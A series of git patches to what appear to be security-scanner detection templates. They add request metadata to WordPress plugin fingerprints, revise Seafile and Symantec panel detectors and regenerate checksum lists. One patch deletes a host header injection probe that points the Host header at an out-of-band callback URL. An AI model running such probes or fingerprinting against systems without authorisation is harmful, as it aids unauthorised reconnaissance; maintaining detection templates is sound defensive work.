info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From d1c0b81d1d7afaeb68f1a2ec065f9618d54b8ba0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Sep 2023 10:47:06 +0530 Subject: [PATCH 0130/1090] Update seafile-api.yaml --- http/exposures/apis/seafile-api.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index 0d6313347e..eb1edae7ed 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -13,6 +13,7 @@ info: metadata: max-request: 1 verified: true + shodan-query: http.html:"seafile" tags: exposure,api http: @@ -29,6 +30,11 @@ http: - 'seafile-pro' condition: or + - type: word + part: header + words: + - 'application/json' + - type: status status: - 200 @@ -38,4 +44,4 @@ http: part: body group: 1 regex: - - '"version":\s*"([0-9.]+)"' \ No newline at end of file + - '"version":\s*"([0-9.]+)"' From fb959fc7ac28fe729895e5a3c8db3941e8317079 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Sep 2023 10:55:08 +0530 Subject: [PATCH 0131/1090] Update seafile-panel.yaml --- http/exposed-panels/seafile-panel.yaml | 33 +++++++++----------------- 1 file changed, 11 insertions(+), 22 deletions(-) diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 9f21760216..c7ae099709 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -2,12 +2,9 @@ id: seafile-panel info: name: Seafile Panel - Detect - author: TechbrunchFR, righettod + author: TechbrunchFR,righettod severity: info description: Seafile panel was detected. - metadata: - max-request: 1 - shodan-query: http.favicon.hash:1552322396 reference: - https://www.seafile.com/en/home/ - https://github.com/haiwen/seafile @@ -15,31 +12,23 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: sefile,panel + metadata: + max-request: 1 + shodan-query: http.favicon.hash:1552322396 + verified: true + tags: sefile,panel,login http: - method: GET path: - - "{{BaseURL}}/media/favicons/favicon.png" + - "{{BaseURL}}/accounts/login/" + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl dsl: - - "status_code==200 && (\"1552322396\" == mmh3(base64_py(body)))" - - - method: GET - path: - - "{{BaseURL}}/accounts/login/" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'SEAFILE_GLOBAL' - - 'seafile-ui.css' + - "status_code==200" + - 'contains(body, "SEAFILE_GLOBAL") && contains(body, "seafile-ui.css")' condition: and - - - type: status - status: - - 200 From 7efb971cbee547d802fa5ee304060a46e254d3db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Sep 2023 11:51:45 +0530 Subject: [PATCH 0132/1090] Delete http/miscellaneous/external-service-interaction.yaml --- .../external-service-interaction.yaml | 31 ------------------- 1 file changed, 31 deletions(-) delete mode 100644 http/miscellaneous/external-service-interaction.yaml diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml deleted file mode 100644 index 8f25c6d01e..0000000000 --- a/http/miscellaneous/external-service-interaction.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: external-service-interaction - -info: - name: External Service Interaction - author: andreluna - severity: medium - description: External Service interaction via Host Header Injection. - reference: - - https://portswigger.net/kb/issues/00300210_external-service-interaction-http - - https://success.qualys.com/support/s/article/000006843 - - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection - classification: - cwe-id: CWE-918,CWE-406 - tags: http,misc - -http: - - method: GET - path: - - "{{BaseURL}}/" - redirects: true - max-redirects: 1 - headers: - Host: "{{interactsh-url}}" - - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or From 55b38ae3839c6a35f1dd2a30a53de18d1b079ba3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 5 Sep 2023 11:56:22 +0530 Subject: [PATCH 0133/1090] Update and rename symantec-phishing-readiness-platform.yaml to symantec-phishing-panel.yaml --- ...adiness-platform.yaml => symantec-phishing-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename http/exposed-panels/symantec/{symantec-phishing-readiness-platform.yaml => symantec-phishing-panel.yaml} (94%) diff --git a/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml b/http/exposed-panels/symantec/symantec-phishing-panel.yaml similarity index 94% rename from http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml rename to http/exposed-panels/symantec/symantec-phishing-panel.yaml index 0d968a4e4c..7379a37938 100644 --- a/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-panel.yaml @@ -1,4 +1,4 @@ -id: symantec-phishing-readiness-platform +id: symantec-phishing-panel info: name: Symantec Phishing Readiness Platform Console @@ -7,9 +7,11 @@ info: description: Management Console for Symantec Phishing Readiness Platform reference: - https://www.broadcom.com/products/cybersecurity/email/phishing-readiness - tags: symantec,panel,login metadata: max-request: 1 + verified: true + + tags: symantec,panel,login self-contained: true variables: @@ -25,9 +27,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Symantec Phishing Readiness Platform" - part: body - type: status status: From 34b0261930b02458866cb9b2dff81d27de24da07 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 07:34:42 +0000 Subject: [PATCH 0134/1090] Auto Generated New Template Addition List [Tue Sep 5 07:34:42 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dd4ea13ad2..d8f4965489 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml +http/misconfiguration/missing-sri.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml http/takeovers/lemlist-takeover.yaml From ac22e9da94e995340edd9f97ef885ceb16fd7463 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 07:35:09 +0000 Subject: [PATCH 0135/1090] Auto Generated Templates Checksum [Tue Sep 5 07:35:09 UTC 2023] :robot: --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ceedfebf8..5c6007aa16 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4546,6 +4546,7 @@ http/misconfiguration/lvm-exporter-metrics.yaml:6c4969c2057c4d8223d1eed2a8c21473 http/misconfiguration/manage-engine-ad-search.yaml:a9d037e57c36bd56b8a340075fe95c37884b3c1d http/misconfiguration/misconfigured-concrete5.yaml:fbd7e1060eeb23bec6e4331af978576619e8a704 http/misconfiguration/misconfigured-docker.yaml:3ba99bbaca7efee00abd6078950a59b3299f343f +http/misconfiguration/missing-sri.yaml:e55af741cda0539ee4b8b9527fa7b8fc23b21b6c http/misconfiguration/mlflow-unauth.yaml:cbfaa296c93b75f1600826d43bac22f2eed987ba http/misconfiguration/mobiproxy-dashboard.yaml:7fe5870248fcc329ad913e20e2877d7895afe762 http/misconfiguration/mobsf-framework-exposure.yaml:f842525c6075743ec5e12cb0246e9efe3d658c19 @@ -5798,218 +5799,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 